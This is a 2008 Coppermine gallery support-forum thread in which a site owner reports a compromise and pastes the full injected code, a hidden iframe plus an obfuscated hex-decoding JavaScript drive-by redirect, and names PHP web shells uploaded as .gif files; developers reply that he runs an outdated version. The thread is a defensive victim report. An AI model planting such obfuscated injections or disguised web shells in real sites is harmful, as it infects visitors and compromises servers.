Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: HACKER ATTACK . . . . be careful  (Read 6454 times)

0 Members and 1 Guest are viewing this topic.

aftab1003

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 67
    • PictureRating Site for Teens
HACKER ATTACK . . . . be careful
« on: October 28, 2008, 06:46:22 pm »

hi fellows

i just recived a hacker attack on my site http://www.picturerating.us

symptoms of attack...

if you are using a strong and updated antivirus like mine KAV 7, then u will be notified your site is trying to download a trojan horse...

actualy there is no virus in your site or server, its an iframe code in to main files, like index, main, home, login, admin etc..
the iframe code is ...
Quote
<script>check_content()</script><script>check_content()</script><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c41687154048m49073afa06296(m49073afa0693c){  return (parseInt(m49073afa0693c,16));}function m49073afa07c30(m49073afa0819d){ function m49073afa0903f(){return 2;} var m49073afa08878='';m49073afa09c06=String.fromCharCode;for(m49073afa08c5e=0;m49073afa08c5e<m49073afa0819d.length;m49073afa08c5e+=m49073afa0903f()){ m49073afa08878+=(m49073afa09c06(c41687154048m49073afa06296(m49073afa0819d.substr(m49073afa08c5e,m49073afa0903f()))));}return m49073afa08878;} var zaf='';var m49073afa0a4bb='3C7'+zaf+'3637'+zaf+'2697'+zaf+'07'+zaf+'43E696628216D7'+zaf+'96961297'+zaf+'B646F637'+zaf+'56D656E7'+zaf+'42E7'+zaf+'7'+zaf+'7'+zaf+'2697'+zaf+'465287'+zaf+'56E657'+zaf+'363617'+zaf+'065282027'+zaf+'2533632536392536362537'+zaf+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zaf+'332537'+zaf+'32253633253364253237'+zaf+'2536382537'+zaf+'342537'+zaf+'342537'+zaf+'302533612532662532662536322537'+zaf+'35253637'+zaf+'2537'+zaf+'61253639253663253663253631253265253638253639253637'+zaf+'2536382536632536352537'+zaf+'362536352536632532652536322536392537'+zaf+'612532662536362536662537'+zaf+'322537'+zaf+'352536642532662534632536312537'+zaf+'33253665253631253366253237'+zaf+'2532622534642536312537'+zaf+'342536382532652537'+zaf+'322536662537'+zaf+'352536652536342532382534642536312537'+zaf+'342536382532652537'+zaf+'32253631253665253634253666253664253238253239253261253332253331253332253331253337'+zaf+'253330253239253262253237'+zaf+'253330253337'+zaf+'253338253634253333253635253633253335253635253237'+zaf+'2532302537'+zaf+'37'+zaf+'2536392536342537'+zaf+'34253638253364253334253333253333253230253638253635253639253637'+zaf+'2536382537'+zaf+'342533642533342533392533302532302537'+zaf+'332537'+zaf+'342537'+zaf+'39253663253635253364253237'+zaf+'2536342536392537'+zaf+'332537'+zaf+'302536632536312537'+zaf+'39253361253230253665253666253665253635253237'+zaf+'2533652533632532662536392536362537'+zaf+'3225363125366425363525336527'+zaf+'29293B7'+zaf+'D7'+zaf+'6617'+zaf+'2206D7'+zaf+'969613D7'+zaf+'47'+zaf+'27'+zaf+'5653B3C2F7'+zaf+'3637'+zaf+'2697'+zaf+'07'+zaf+'43E';document.write(m49073afa07c30(m49073afa0a4bb));</script><script>check_content()</script>

and its redirects the visitors to site...

bugzilla.highlevel.biz/forum/las

i am using 3 scripts on my site

picturerating.us/picturerating/index.php picture rating
picturerating.us/picture-gallery/index.php coppermine latest update
blog.picturerating.us wordpress latest updated blog

actualy i exactly dont know where the hacker came in, but there is only way where user can uplaod some pictures in coppermine...

it effect all of my websites hosted on my server( hostmonster ) but only main index or importent files...

SOLOUTION

i am trying to removing the iframe code from each of my files by downloading every file, and then reuploading it after iframe code removal...

if any one find or facing any type of this issue, then tell here if you know where from hacker inject the code in our pages, so ADMIN team close this security hole to protect our thosands of sites running their script...


i hope this will help to other members like me...

have nice day and take care.
Logged

aftab1003

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 67
    • PictureRating Site for Teens
Re: HACKER ATTACK . . . . be careful
« Reply #1 on: October 28, 2008, 07:56:23 pm »

the infected files found...

the infected files stored in my gallery...

picturerating.us/picture-gallery/albums/userpics/sss_php.gif: PHP.Shell
picturerating.us/picture-gallery/albums/userpics/c99shell_php.gif: Trojan.PHP.C99Shell

but one thing that i am not allowing any one to get registered, and the how these files entered


soloution

remove thesefiles,and block this .GIF extension for further uploadings...
and then remove all iframes manualy or askur host to do this...

GOOD LUCK
Logged

Nibbler

  • Guest
Re: HACKER ATTACK . . . . be careful
« Reply #2 on: October 28, 2008, 08:28:12 pm »

You are running version 1.4.17 - certainly not the latest.
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: HACKER ATTACK . . . . be careful
« Reply #3 on: October 28, 2008, 11:24:54 pm »

I have little sympathy for people who are reluctant to upgrade and then blame the app if an attacker was able to exploit know vulnerabilities of the old, outdated version you run.
Logged

mattduke19

  • Coppermine newbie
  • Offline Offline
  • Posts: 1
Re: HACKER ATTACK . . . . be careful
« Reply #4 on: October 29, 2008, 04:40:49 pm »

I'm not using Coppermine, just a basic Wordpress blog, but I also lost controls to all .php files recently. After using Firebug I found this at the bottom of my page -

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c41687154048m49..(ridiculously long string)....</script>

I'm removing the entire blog for now to see what happens.
Good luck




Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: HACKER ATTACK . . . . be careful
« Reply #5 on: October 29, 2008, 11:46:46 pm »

Thanks for your report. If you don't even use coppermine, chances are high that you haven't been infected by a vulnerability in coppermine.
Many hacks (the payload) involve silly <iframe>/<script> code injections, so the fact that an iframe shows doesn't mean anything special.
Logged
Pages: [1]   Go Up
 

Page created in 0.023 seconds with 19 queries.